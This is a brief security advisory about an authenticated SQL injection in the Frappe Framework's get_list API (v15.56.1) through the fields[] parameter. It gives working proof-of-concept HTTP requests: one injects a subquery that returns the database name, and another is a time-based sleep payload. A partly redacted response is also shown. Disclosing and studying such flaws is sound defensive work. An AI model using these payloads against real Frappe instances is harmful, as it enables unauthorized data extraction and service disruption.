An authenticated SQL injection vulnerability exists in the frappe.desk.reportview.get_list API of the Frappe Framework, affecting versions v15.56.1. The vulnerability stems from improper sanitization of the fields[] parameter, which allows low-privileged users to inject arbitrary SQL expressions directly into the SELECT clause.

Sample Structured Query Language Injection:

Request:

GET /api/method/frappe.desk.reportview.get_list?fields=%5B%22salary_component_abbr%2c(SELECT%20database())%20AS%20current_db%22%5D&doctype=Salary%20Component&limit=20&_=1748066407934 HTTP/2
Host: --host--
Cookie: ******
--snip--

Response:

HTTP/2 200 OK

{"message":[{"salary_component_abbr":"H***","current_db":"_**************"},
--snip--

Time based attack:

Request

GET /api/method/frappe.desk.reportview.get_list?fields=[%22salary_component_abbr%2c(select*from(select(sleep(200)))a)%22]&doctype=Salary%20Component&limit=20&_=1748066407933 HTTP/2
Host: --host--
Cookie: ******
--snip--